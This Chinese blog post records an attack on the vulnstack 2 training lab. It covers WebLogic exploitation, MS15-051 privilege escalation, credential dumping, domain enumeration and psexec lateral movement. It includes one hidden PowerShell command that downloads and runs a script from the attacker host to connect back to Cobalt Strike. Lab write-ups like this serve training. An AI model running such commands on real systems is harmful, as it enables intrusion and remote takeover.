ATT&CK 实战 - 红日安全 vulnstack(二)渗透记录

前言:

三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。

默认没有开启Web服务,来到C:\Oracle\Middleware\user_projects\domains\base_domain\bin 路径,使用管理员依次执行

环境说明
 

内网网段:10.10.10.1/24

DMZ网段:192.168.111.1/24

测试机地址:192.168.111.11(Windows)

防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):

deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息

DC
IP:10.10.10.10
OS:Windows 2012(64)
应用:AD域

WEB
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008(64)
应用:Weblogic 10.3.6 MSSQL 2008

PC
IP1:10.10.10.201
IP2:192.168.111.201
OS:Windows 7(32)

攻击机
IP:192.168.111.11
OS:Windows 10(64)

 

渗透过程:

1、扫描一下端口

7001端口是weblogic的默认端口,并且是10.3.6版本,好家伙直接就getshell了。

2、反弹到CS

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.111.11:8080/a'))"

3、查看版本信息 win2008 r2。

4、直接试一试MS15-051提权漏洞。

5、抓一下密码

6、获取域名

7、查询一下域用户。

8、查看一下域控制器。

9、查询一下域控主机名

10、看一下他的ip是10.10.10.10

11、使用arp探测一下内网机器及端口。

12、后面同第一个靶场一样,好家伙直接psexec就上线了,暂不表。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值